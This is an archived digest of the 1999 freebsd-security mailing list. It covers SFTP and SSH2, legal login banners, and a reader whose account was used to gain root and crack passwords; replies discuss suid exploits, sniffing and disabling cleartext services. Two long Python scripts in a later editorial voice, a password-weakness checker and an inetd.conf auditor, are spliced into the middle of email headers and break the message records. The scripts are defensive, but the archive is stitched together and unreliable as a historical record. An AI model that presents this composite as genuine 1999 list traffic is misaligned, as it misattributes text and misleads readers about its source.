From owner-freebsd-security Fri May 28 5:41:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id CECAE152AA for ; Fri, 28 May 1999 05:41:39 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA26847; Fri, 28 May 1999 09:41:43 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199905281241.JAA26847@ns1.sminter.com.ar> Subject: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: from Nicholas Brawn at "May 28, 99 10:13:09 pm" To: ncb@zip.com.au (Nicholas Brawn) Date: Fri, 28 May 1999 09:41:43 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In an earlier message, Nicholas Brawn wrote:
> - SFTP/SCP

SFTP? Is it just FTP+SSH port forwarding, or really encrypted auth and data? Are there Win clients available?

Fernando P. Schapachnik
Network administration
VIA Net Works Argentina SA

From owner-freebsd-security Fri May 28 5:43:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 17E8C15A5C for ; Fri, 28 May 1999 05:43:22 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id WAA03097; Fri, 28 May 1999 22:43:17 +1000 Date: Fri, 28 May 1999 22:43:15 +1000 (EST)
From: Nicholas Brawn To: Fernando Schapachnik Cc: freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: <199905281241.JAA26847@ns1.sminter.com.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Never having personally used it (big scp fan), I believe it's part of SSH2. Check the documents on www.ssh.fi. If there are windows clients available, they will probably be linked from there.

Nick

On Fri, 28 May 1999, Fernando Schapachnik wrote:
> In an earlier message, Nicholas Brawn wrote:
> > - SFTP/SCP
>
> SFTP? Is it just FTP+SSH port forwarding, or really encrypted auth and data? Are
> there Win clients available?
>
> Fernando P. Schapachnik
> Network administration
> VIA Net Works Argentina SA

From owner-freebsd-security Fri May 28 15:57: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.andrew.cmu.edu (SMTP2.ANDREW.CMU.EDU [128.2.10.82]) by hub.freebsd.org (Postfix) with ESMTP id B49A014DC5 for ; Fri, 28 May 1999 15:57:01 -0700 (PDT) (envelope-from Harry_M_Leitzell@cmu.edu) Received: from unix6.andrew.cmu.edu (UNIX6.ANDREW.CMU.EDU [128.2.15.10]) by smtp2.andrew.cmu.edu (8.8.5/8.8.2) with ESMTP id SAA05940; Fri, 28 May 1999 18:54:36 -0400 (EDT) Date: Fri, 28 May 1999 18:54:37 -0400 (EDT)
From: "Harry M. Leitzell" X-Sender: Harry_M_Leitzell@unix6.andrew.cmu.edu To: Nicholas Brawn Cc: Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I am personally curious as to whether or not someone has developed a free SSH2 daemon yet. I would like to see a nice free implementation of it developed (maybe with a nice sftp curses client a la ncftp) and am pondering whether or not to work on it in my spare time. I like scp but sometimes prefer an ftp client interface when transferring files. Just a thought. It would also be nice to have free Win32 development going on for that, but I guess you can't have everything. Any pointers from people would be nice.

On Fri, 28 May 1999, Nicholas Brawn wrote:
> Never having personally used it (big scp fan), I believe it's part of
> SSH2. Check the documents on www.ssh.fi. If there are windows clients
> available, they will probably be linked from there.
>
> Nick
>
> On Fri, 28 May 1999, Fernando Schapachnik wrote:
>
> > In an earlier message, Nicholas Brawn wrote:
> > > - SFTP/SCP
> >
> > SFTP? Is it just FTP+SSH port forwarding, or really encrypted auth and data? Are
> > there Win clients available?
> >
> > Fernando P. Schapachnik
> > Network administration
> > VIA Net Works Argentina SA

[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
Harry M.
Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]

From owner-freebsd-security Fri May 28 16: 0:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.inficad.com (mail.inficad.com [207.19.74.5]) by hub.freebsd.org (Postfix) with ESMTP id DE82214DC5 for ; Fri, 28 May 1999 16:00:34 -0700 (PDT) (envelope-from joeym@inficad.com) Received: from exchsrvr.inficad.com (exchsrvr.inficad.com [208.204.81.4]) by mail.inficad.com (8.9.3/8.9.0) with ESMTP id QAA83393; Fri, 28 May 1999 16:00:24 -0700 (MST) Received: by exchsrvr.inficad.com with Internet Mail Service (5.5.1960.3) id ; Fri, 28 May 1999 16:00:57 -0700 Message-ID: <813A3F0E2D02D211884900A0C966731EA7AD79@exchsrvr.inficad.com> From: joeym@inficad.com To: Harry_M_Leitzell@cmu.edu Cc: freebsd-security@FreeBSD.ORG Subject: RE: SFTP (was Re: legal notice for telnet/etc) Date: Fri, 28 May 1999 16:00:56 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.1960.3) Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Look for 'lsh' on http://freshmeat.net .. I just saw it a day or two ago, and I believe it claimed to be a free implementation of ssh2.

-- Joey Miller
Lead Programmer
Inficad Communications
602.265.4423 / 888.265.4423

-----Original Message-----
From: Harry M. Leitzell [mailto:Harry_M_Leitzell@cmu.edu] Sent: Friday, May 28, 1999 3:55 PM To: Nicholas Brawn Cc: Fernando Schapachnik; freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc)

I am personally curious as to whether or not someone has developed a free SSH2 daemon yet. I would like to see a nice free implementation of it developed (maybe with a nice sftp curses client a la ncftp) and am pondering whether or not to work on it in my spare time. I like scp but sometimes prefer an ftp client interface when transferring files. Just a thought. It would also be nice to have free Win32 development going on for that, but I guess you can't have everything. Any pointers from people would be nice.

On Fri, 28 May 1999, Nicholas Brawn wrote:
> Never having personally used it (big scp fan), I believe it's part of
> SSH2. Check the documents on www.ssh.fi. If there are windows clients
> available, they will probably be linked from there.
>
> Nick
>
> On Fri, 28 May 1999, Fernando Schapachnik wrote:
>
> > In an earlier message, Nicholas Brawn wrote:
> > > - SFTP/SCP
> >
> > SFTP? Is it just FTP+SSH port forwarding, or really encrypted auth and data? Are
> > there Win clients available?
> >
> > Fernando P. Schapachnik
> > Network administration
> > VIA Net Works Argentina SA

[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key
[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]

From owner-freebsd-security Fri May 28 16:18:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id C51F2156FB for ; Fri, 28 May 1999 16:18:42 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id QAA02314; Fri, 28 May 1999 16:18:07 -0700 (PDT) Message-ID: <19990528161807.A1393@best.com> Date: Fri, 28 May 1999 16:18:07 -0700
From: "Jan B. Koum " To: Nicholas Brawn , Sheldon Hearn Cc: freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc References: <671.927888503@axl.noc.iafrica.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Nicholas Brawn on Fri, May 28, 1999 at 10:13:09PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 28, 1999 at 10:13:09PM +1000, Nicholas Brawn wrote: > For the systems I'm looking at, the main entry points into the system will > be: > - Telnet > - FTP > - SSH > - SFTP/SCP > > Telnet and Ftp banners look relatively simple to implement. But it looks a > bit tricky with ssh without displaying until the user has logged in. > Alternatively you could get them to sign a legal document prior to > granting them access to IT resources which discusses what authority they > have over what, which is already a recommendation. If it cannot be > displayed until a user logs in (/etc/motd), nobody's going to die. And if > you say they may be able to quell such notices via .hushlogin, we can add > something to /etc/profile to display notices, or even specify a program as > their shell which does nothing more than displaying the notice before > dropping them into a shell. > > At this stage I'm keen to find out what simply solutions there are > available. If I need to tinker, so be it. :) > > Thanks to everyone for the input, > Nick If you need to tinker, then for ssh you can do something similar to the following: user goes to https://ssh.yourcompany.com The page asks username:password and present user with an agreement of usage. 
If he agrees by clicking on "I Agree", you give him a new ssh RSA key (ssh-keygen) and, while he takes a second to download it, you place the key in his $HOME/.ssh.

The weak part in the picture is username:passwd -- replace it with something like Cryptocard (www.cryptocard.com -- which happens to support FreeBSD, btw) and you're all set. They actually have an apache module to auth against their radiusd server ...

Tinker away Nick. ;)

-- yan

From owner-freebsd-security Fri May 28 16:51:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id 93AD914CA0 for ; Fri, 28 May 1999 16:51:09 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id UAA08269; Fri, 28 May 1999 20:51:07 -0300 (ADT) Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id UAA05764; Fri, 28 May 1999 20:51:05 -0300 (ADT) Date: Fri, 28 May 1999 20:51:05 -0300 (ADT)
From: Michael Richards <026809r@dragon.acadiau.ca> X-Sender: 026809r@dragon To: Dima Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: <199905280927.OAA08009@nic.mmc.net.ge> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 28 May 1999, Dima wrote:

> can hack into my system. He has an ordinary account open. So, he won! And
> I am wondering if there are any security holes in 3.1? He logged in as
> himself via telnet, then made himself root (but he was not in the wheel group
> and of course did not know the root password) and, what is more interesting, he

Finding an exploitable suid program would allow this to happen.

> cracked several passwords. He did all this in 2 hours, and the passwords were
> a minimum of 10 symbols in length, containing different cases and digits. I am
> using MD5 coding, and as far as I knew that is impossible. Does anyone have an idea

I would do 2 things:

a) take your master.passwd file and run crack on it yourself and see if it finds the passwords itself. I played with crack once a long time ago and based on what you've said about the cracked password, I believe it is more likely that he
   a) broke root
   b) sniffed the passwords

or maybe he shoulder-surfed the passwords... I don't believe that md5 can be cracked that quickly. I guess it depends on the randomness of the password. "thisissEcur3" might take a week, but crack will still get it. I think one of the first rules is to replace [il]=1 e=3 s=5 a=4 and all the other commonly substituted letters.
-Michael

From owner-freebsd-security Fri May 28 18:16: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from acetylene.vapornet.net (acetylene.vapornet.net [209.100.218.11]) by hub.freebsd.org (Postfix) with ESMTP id A103214DD5 for ; Fri, 28 May 1999 18:16:01 -0700 (PDT) (envelope-from john@vapornet.net) Received: from datapit.home.vapornet.net (vapornet.xnet.com [205.243.141.107]) by acetylene.vapornet.net (8.9.3/8.9.3/VaporServer 2.01) with ESMTP id UAA07249; Fri, 28 May 1999 20:13:23 -0500 (CDT) (envelope from: john@vapornet.net) Received: from habanero.chili-pepper.net (habanero.chili-pepper.net [192.168.0.11]) by datapit.home.vapornet.net (8.9.3/8.9.3/VaporServer 1.4) with ESMTP id UAA30705; Fri, 28 May 1999 20:13:07 -0500 (CDT) (envelope from: john@vapornet.net) Received: (from john@localhost) by habanero.chili-pepper.net (8.9.3/8.9.3/VaporClient v3.1) id UAA29676; Fri, 28 May 1999 20:12:53 -0500 (CDT) (envelope from: john@vapornet.net)
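Michael's point about crack's rules, that [il]=1, e=3, s=5, a=4 and the other usual substitutions are tried as a matter of course, is easiest to see from the password-policy side. The following is an added example, not code from the thread or from Crack: it reverses the common substitutions, strips trailing digits, and asks whether what is left is a dictionary word or a concatenation of dictionary words. The word list is a constructed stand-in for a real dictionary; "thisissEcur3" is Michael's example. A cracker applies the same rules in the forward direction and hashes every mangled candidate with the salt from master.passwd, which is why the choice of MD5 crypt buys time but does not rescue a password with this structure; this check hashes nothing and is meant to run when the password is set.

```python
"""Undo crack-style substitutions and look for dictionary structure
(added example; a password-policy check, not a cracker)."""
import itertools

# Substitutions crack's rules try, read backwards. A character with two
# readings ('1' -> 'i' or 'l') expands into two candidates.
LEET = {"1": "il", "3": "e", "5": "s", "4": "a", "0": "o", "7": "t",
        "@": "a", "$": "s", "!": "i", "|": "l"}

# Constructed stand-in for a real word list.
WORDS = {"this", "is", "secure", "password", "secret", "root", "wheel",
         "freebsd", "login", "hacker", "guru", "bible", "hell", "klingon"}


def unleet(password):
    """Every plaintext the password could be a leet-spelling of, lower-cased."""
    choices = [LEET.get(ch, ch) for ch in password.lower()]
    return {"".join(combo) for combo in itertools.product(*choices)}


def segment(s, words, min_len=2):
    """Split s into a sequence of dictionary words, or return None.

    Dynamic programming over prefixes; candidate words shorter than
    min_len are ignored so single letters cannot glue a split together.
    """
    best = [None] * (len(s) + 1)
    best[0] = []
    for i in range(1, len(s) + 1):
        for j in range(0, i - min_len + 1):
            if best[j] is not None and s[j:i] in words:
                best[i] = best[j] + [s[j:i]]
                break
    return best[len(s)]


def weakness(password, words=WORDS):
    """Return why the password falls to dictionary plus rules, or None."""
    for cand in sorted(unleet(password)):
        # Try the candidate as-is and with a trailing digit suffix removed
        # ("secure99" is "secure" to a rule-based cracker).
        for body in (cand, cand.rstrip("0123456789")):
            if body in words:
                return "dictionary word %r" % body
            parts = segment(body, words)
            if parts:
                return "dictionary words %s" % "+".join(parts)
    return None


if __name__ == "__main__":
    for pw in ("thisissEcur3", "P4ssw0rd99", "fr33b5d", "xq7!Lm2#Rv"):
        print("%-14s %s" % (pw, weakness(pw) or "no dictionary structure found"))
```

Length and mixed case, the two properties Dima's policy enforced, are not what this check looks at: "thisissEcur3" is twelve characters with case and a digit and still reduces to three dictionary words, which is exactly the structure a rules-driven cracker enumerates first.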
From: John Preisler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Fri, 28 May 1999 20:12:53 -0500 (CDT) To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: References: <199905280927.OAA08009@nic.mmc.net.ge> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14159.15859.140011.281075@habanero.chili-pepper.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You never mentioned which 3rd-party applications [ports, packages, et cetera] you installed on this machine. It's quite possible one of those was compromised [see also qpopper, imapd, and wu-ftpd]. $0.02 worth. -j Michael Richards writes: > On Fri, 28 May 1999, Dima wrote: > > > can hack into my system. He has an ordinary account opened. So, he wins! And > > I'm wondering if there are any security holes in 3.1? He logged in as > > himself via telnet, then he made himself root (but he was not in the wheel group > > and of course did not know the root password) and what is more interesting he > Finding an exploitable suid program would allow this to happen. > > > cracked several passwords. He made all this in 2 hours, and the passwords were > > a minimum of 10 symbols in length, containing different cases and digits. I am > > using MD5 coding, and as I knew it is impossible. Does anyone have any idea > I would do 2 things: > a) take your master.passwd file and run crack on it yourself and see if it > finds the passwords itself. I played with crack once a long time ago and > based on what you've said about the cracked password, I believe it is more > likely that he > a) broke root > b) sniffed the passwords > > or maybe he shoulder-surfed the passwords... I don't believe that md5 can > be cracked that quickly. I guess it depends on the randomness of the > password. "thisissEcur3" might take a week, but crack will still get it. 
> I think one of the first rules is to replace [il]=1 e=3 s=5 a=4 and all > the other commonly substituted letters. > > -Michael > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 18:27:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from ptldpop2.ptld.uswest.net (ptldpop2.ptld.uswest.net [198.36.160.2]) by hub.freebsd.org (Postfix) with SMTP id 73E9915A73 for ; Fri, 28 May 1999 18:27:22 -0700 (PDT) (envelope-from dpilgrim@uswest.net) Received: (qmail 25890 invoked by alias); 29 May 1999 01:27:20 -0000 Delivered-To: fixup-security@FreeBSD.ORG@fixme Received: (qmail 25872 invoked by uid 0); 29 May 1999 01:27:18 -0000 Received: from cdsl201.ptld.uswest.net (HELO uswest.net) (209.180.170.201) by ptldpop2.ptld.uswest.net with SMTP; 29 May 1999 01:27:18 -0000 Message-ID: <374F4268.F4993C8B@uswest.net> Date: Fri, 28 May 1999 18:27:04 -0700 
From: Organization: Neatly stacked heaps of digital chaos X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Richards wrote: > > On Fri, 28 May 1999, Dima wrote: > > > can hack into my system. He has an ordinary account opened. So, he wins! And > > I'm wondering if there are any security holes in 3.1? He logged in as > > himself via telnet, then he made himself root (but he was not in the wheel group > > and of course did not know the root password) and what is more interesting he > Finding an exploitable suid program would allow this to happen. > > > cracked several passwords. He made all this in 2 hours, and the passwords were > > a minimum of 10 symbols in length, containing different cases and digits. I am > > using MD5 coding, and as I knew it is impossible. Does anyone have any idea > I would do 2 things: > a) take your master.passwd file and run crack on it yourself and see if it > finds the passwords itself. I played with crack once a long time ago and > based on what you've said about the cracked password, I believe it is more > likely that he > a) broke root > b) sniffed the passwords > > or maybe he shoulder-surfed the passwords... I don't believe that md5 can > be cracked that quickly. I guess it depends on the randomness of the > password. "thisissEcur3" might take a week, but crack will still get it. > I think one of the first rules is to replace [il]=1 e=3 s=5 a=4 and all > the other commonly substituted letters. I wrote a password cracking/guessing program that has an option to do 'leet character substitutions; they're far too well known and thus not a very good way to make a password secure. 
Case-sensitive alphanumeric random character generation is far more secure, with an 8 character password having over 136.3 trillion possibilities assuming no repeat characters. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 21:51:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 68B8214E6D for ; Fri, 28 May 1999 21:51:44 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA09482 for ; Sat, 29 May 1999 00:51:43 -0400 (EDT) 
From: mike@sentex.net (Mike Tancsa) To: security@FreeBSD.ORG Subject: Re: System beeing cracked! Date: Sat, 29 May 1999 05:02:51 GMT Message-ID: <374f731c.607312609@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 28 May 1999 05:26:55 -0400, in sentex.lists.freebsd.misc you wrote: >Hello, >I have 3.1 installed and friend of mine made a bet that he can hack >into my system. He has ordinary account opened. >security holes in 3.1? He login as himself >it was done? Please, answer me, >as my friend do not tell me anything >about this as he feel like guru-hacker. >Thank you. Did your friend have access to a machine on the same ethernet ? He could have sniffed your password and the root's password, and then logged in as you, and then su'd to root. ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 23:10:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from vital.bleeding.com (vital.bleeding.com [206.251.12.170]) by hub.freebsd.org (Postfix) with ESMTP id AEC8515139 for ; Fri, 28 May 1999 23:10:09 -0700 (PDT) (envelope-from jjwolf@bleeding.com) Received: from crimson (crimson [144.254.195.6]) by vital.bleeding.com (8.9.2/8.9.2) with SMTP id XAA02684 for ; Fri, 28 May 1999 23:10:09 -0700 (PDT) (envelope-from jjwolf@bleeding.com) Message-ID: <006201bea999$ee5e4b00$06c3fe90@cisco.com> 
From: "Justin Wolf" To: References: <374f731c.607312609@mail.sentex.net> Subject: Re: System beeing cracked! Date: Fri, 28 May 1999 23:10:14 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Did your friend have access to a machine on the same ethernet ? He could > have sniffed your password and the root's password, and then logged in as > you, and then su'd to root. To add my own meager two cents: My machine (running 2.2.8-R) was recently hacked because someone got their password sniffed (on another network). The attacker then used this account to gain root. Fortunately they didn't do any damage except change the root password (and perhaps trojan the kernel). When I reinstalled with 3.1-R, I turned off ftpd and telnetd in inetd.conf. The only way to get to the machine now is via ssh/scp (since there are ssh clients for all major OSes these days, it's not too much of a hardship... Windows even has a (ssh2) version of scp now). This makes it more or less impossible for someone on the same net to sniff passwords. I never EVER su to root unless I'm on a 100% secure (ssh) session. Obviously there are still holes that people can exploit, but my feeling was that this is probably the easiest way to gain root privileges, so this is the hole I plugged. The basic security rule is: Never run any services unless you have to. Don't have bpf compiled into the kernel. Get strobe and run it on localhost - see what's open. You might not even expect the results (such as X forwarding and RPC). And lastly, always keep up on CERT and BugTraq, and run the latest version of all software (ssh, popper, sendmail, etc.) and patches. 
Good luck, -Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 7:26:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id CDF7615053 for ; Sat, 29 May 1999 07:26:53 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA27587; Sat, 29 May 1999 18:26:25 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Sat, 29 May 1999 18:25:40 +0400 Received: from undisclosed-intranet-sender id xma003114; Sat, 29 May 99 18:25:36 +0400 
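The hardening steps Justin lists (stop running telnetd and ftpd, keep only ssh, know what is actually listening) can be checked mechanically before the next inetd restart. The script below is an added example for this thread, not code from the message or from FreeBSD: it parses an inetd.conf in the FreeBSD 3.x layout, flags every enabled service whose protocol carries passwords or host trust in the clear, and produces a copy with those lines commented out. The inetd.conf content is a constructed sample rather than any real host's file, and the list of cleartext services and the replacement advice are my own choices.

```python
"""Audit an inetd.conf for services that move credentials in the clear and
emit a hardened copy.  Added example, not from the mailing list or FreeBSD;
the configuration text below is a constructed sample."""

# Protocols that send passwords (or rely on spoofable host trust) unencrypted.
# Anyone sniffing the same segment recovers them, which is the attack the
# thread is discussing.  Mapping: service name -> what to use instead.
CLEARTEXT_SERVICES = {
    "telnet": "ssh",
    "ftp": "scp/sftp",
    "pop3": "POP3 inside SSL or an ssh port forward",
    "imap": "IMAP inside SSL or an ssh port forward",
    "shell": "ssh (rsh trusts forgeable source addresses)",
    "login": "ssh (rlogin trusts forgeable source addresses)",
    "exec": "ssh",
}

# Constructed sample /etc/inetd.conf in the FreeBSD 3.x layout, not a real file.
SAMPLE_INETD_CONF = """\
# constructed sample /etc/inetd.conf (FreeBSD 3.x layout), not a real host's file
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
#login  stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
#exec   stream  tcp     nowait  root    /usr/libexec/rexecd     rexecd
pop3    stream  tcp     nowait  root    /usr/local/libexec/popper   popper
comsat  dgram   udp     wait    tty:tty /usr/libexec/comsat     comsat
ntalk   dgram   udp     wait    tty:tty /usr/libexec/ntalkd     ntalkd
"""

SOCKET_TYPES = ("stream", "dgram", "raw", "rdm", "seqpacket")


def parse_inetd(text):
    """Yield (lineno, service, proto, enabled, raw) for each service line.

    A leading '#' marks a disabled service; free-text comments are told apart
    from disabled services by checking the socket-type field."""
    for n, raw in enumerate(text.splitlines(), 1):
        body = raw.strip().lstrip("#").strip()
        fields = body.split()
        if len(fields) < 6 or fields[1] not in SOCKET_TYPES:
            continue
        yield n, fields[0], fields[2], not raw.strip().startswith("#"), raw


def audit(text):
    """Return [(lineno, service, replacement)] for enabled cleartext services."""
    return [(n, svc, CLEARTEXT_SERVICES[svc])
            for n, svc, _proto, enabled, _raw in parse_inetd(text)
            if enabled and svc in CLEARTEXT_SERVICES]


def harden(text):
    """Return a copy of the file with every flagged service commented out."""
    flagged = {n for n, _svc, _why in audit(text)}
    lines = text.splitlines()
    return "\n".join("#" + raw if n in flagged else raw
                     for n, raw in enumerate(lines, 1)) + "\n"


def enabled_services(text):
    """Sorted names of the services inetd would actually start."""
    return sorted(svc for _n, svc, _p, enabled, _r in parse_inetd(text) if enabled)


if __name__ == "__main__":
    for n, svc, why in audit(SAMPLE_INETD_CONF):
        print(f"line {n}: {svc} is enabled and cleartext; use {why}")
    print("still enabled after hardening:", enabled_services(harden(SAMPLE_INETD_CONF)))
```

After writing the hardened file into place, inetd has to be told to re-read it (a HUP to the inetd process) and the result confirmed from outside, with strobe or netstat, rather than trusted from the file alone; services started from rc files or running as their own daemons never appear in inetd.conf at all. Commenting out pop3 this way cuts mail users off, so it is only a fix if an encrypted alternative is offered in its place.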
From: -=ArkanoiD=- Message-Id: <199905291425.SAA20774@paranoid.eltex.spb.ru> Subject: Re: legal notice for telnet/etc In-Reply-To: <19990528161807.A1393@best.com> from "Jan B. Koum " at "May 28, 1999 04:18:07 pm" To: jkb@best.com (Jan B. Koum ) Date: Sat, 29 May 1999 18:25:20 +0400 (MSD) Cc: ncb@zip.com.au, sheldonh@uunet.co.za, freebsd-security@FreeBSD.ORG Reply-To: ark@eltex.ru X-Mailer: ELM [version 2.4ME+ PL53 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nuqneH, Cool. Except you need http server - and that is not always acceptable.. Do you have that implemented? Scripts etc? Somebody (maybe you, Jan B. Koum ) WROTE: > > If you need to tinker, then for ssh you can do something similar to > the following: > > user goes to https://ssh.yourcompany.com > > The page asks username:password and present user with an agreement > of usage. If he will agree by clicking on "I Agree", you give him a new ssh > RSA key (ssh-keygen) and while he takes a second to download it, you place > the key in his $HOME/.ssh > > They weak part in the picture is username:passwd -- replace is with > something like Cryptocard (www.cryptocard.com -- which happen to support > FreeBSD btw) and you all set. They actually have apache module to auth > against their radiusd server ... Tinker away Nick. ;) > > > -- yan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! 
